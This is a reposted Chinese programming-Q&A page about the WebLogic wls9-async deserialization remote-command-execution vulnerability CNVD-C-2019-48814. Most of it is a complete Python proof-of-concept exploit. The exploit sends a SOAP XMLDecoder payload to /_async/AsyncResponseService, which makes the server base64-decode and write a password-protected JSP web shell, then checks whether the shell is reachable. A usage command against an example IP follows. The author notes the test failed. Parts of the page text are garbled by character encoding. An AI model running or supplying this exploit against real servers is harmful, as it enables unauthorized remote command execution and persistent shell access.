當(dāng)前位置：首頁 > 编程资源 > 编程问答 >内容正文

编程问答

CNVD-C-2019-48814 漏洞

發(fā)布時(shí)間：2025/3/15 编程问答 23 豆豆

生活随笔收集整理的這篇文章主要介紹了 CNVD-C-2019-48814 漏洞小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

CNVD-C-2019-48814

WebLogic wls9-async反序列化遠(yuǎn)程命令執(zhí)行漏洞

網(wǎng)上均有詳細(xì)的說明（https://github.com/jas502n/CNVD-C-2019-48814）

（https://github.com/SkyBlueEternal/CNVD-C-2019-48814-or-CNNVD-201904-961）

利用payload 寫個(gè) POC 。

利用：url+_async/AsyncResponseService ，判斷狀態(tài)，POST payload? 判斷是否成功get shell 。

import requests import sys def poc():url =str(sys.argv[1])path ="/_async/AsyncResponseService"headers = {'User-Agent': "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.87 Safari/537.36",'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",'Content-Type': "text/xml"}payload = """<?xml version="1.0" encoding="Utf-8"?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.8.0_131" class="java.beans.xmlDecoder"><void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3"><void index="0"><string>bash</string></void><void index="1"><string>-c</string></void><void index="2"><string>echo Jmx0OyUNCiAgICAgICAgamF2YS5pby5JbnB1dFN0cmVhbSBpbiA9IFJ1bnRpbWUuZ2V0UnVudGltZSgpLmV4ZWMocmVxdWVzdC5nZXRQYXJhbWV0ZXIoIm9yYW5nZSIpKS5nZXRJbnB1dFN0cmVhbSgpOw0KICAgICAgICBpbnQgYSA9IC0xOyAgICAgICAgICANCiAgICAgICAgYnl0ZVtdIGIgPSBuZXcgYnl0ZVsxMDI0XTsgICAgICAgICAgDQogICAgICAgIG91dC5wcmludCgiJmx0O3ByZSZndDsiKTsgICAgICAgICAgDQogICAgICAgIHdoaWxlKChhPWluLnJlYWQoYikpIT0tMSl7DQogICAgICAgICAgICBvdXQucHJpbnRsbihuZXcgU3RyaW5nKGIpKTsgICAgICAgICAgDQogICAgICAgIH0NCiAgICAgICAgb3V0LnByaW50KCImbHQ7L3ByZSZndDsiKTsNCiUmZ3Q7DQo=|base64 -d >servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/shell.jsp</string></void></array><void method="start"/></void></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>"""try:request = requests.post(url+path,data=payload,headers=headers)print '[+] exploit url: %s_async/AsyncResponseService' % urlif request.status_code == 202:print '[+] %s exploit success!' % urlrequest2 = requests.get(url+'/_async/shell.jsp')if request2.status_code == 200:print '[+] get shell: %s/_async/shell.jsp pass is orange ' % urlelse:print '[-] get shell fail 'else:print '[-] %s exploit faile' % urlexcept:print '[-] %s address cannot connect' % url if __name__=='__main__':poc()

攻擊：

python CNVD-C-2019-48814.py http://111.111.111.111:7001/

攻擊成功之后，可以獲得一個(gè)shell GET 密碼是orange?

測(cè)試失敗。

轉(zhuǎn)載于:https://www.cnblogs.com/Oran9e/p/10772713.html

總結(jié)

以上是生活随笔為你收集整理的CNVD-C-2019-48814 漏洞的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。

漏洞
CNVD